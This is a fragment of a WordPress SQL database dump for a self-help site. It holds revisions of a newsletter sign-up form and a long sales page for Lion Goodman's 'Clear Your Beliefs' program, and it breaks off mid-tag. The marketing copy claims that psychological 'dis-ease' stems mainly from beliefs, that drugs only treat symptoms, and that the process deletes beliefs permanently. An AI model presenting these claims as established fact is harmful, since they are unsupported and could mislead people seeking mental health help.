class="infusion-field" style="text-align: center;"></div>\r\n<div class="infusion-submit" style="text-align: center;"><input type="submit" value="Submit" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:38:19', '2014-06-15 11:38:19', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(866, 4194, '2014-06-15 06:40:05', '2014-06-15 11:40:05', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box">\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input type="submit" value="Submit" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:40:05', '2014-06-15 11:40:05', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(867, 4194, '2014-06-15 06:44:38', '2014-06-15 11:44:38', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%;">\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="Submit" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:44:38', '2014-06-15 11:44:38', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(868, 4194, '2014-06-15 06:45:36', '2014-06-15 11:45:36', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="Submit" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:45:36', '2014-06-15 11:45:36', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(877, 2, '2014-06-16 18:12:49', '2014-06-16 23:12:49', '', 'praying to Sol', '', 'inherit', 'closed', 'open', '', 'praying-to-sol', '', '', '2014-06-16 18:12:49', '2014-06-16 23:12:49', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(915, 4194, '2014-06-17 13:20:49', '2014-06-17 18:20:49', '<div style="width: 125%; margin-left: -80px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" 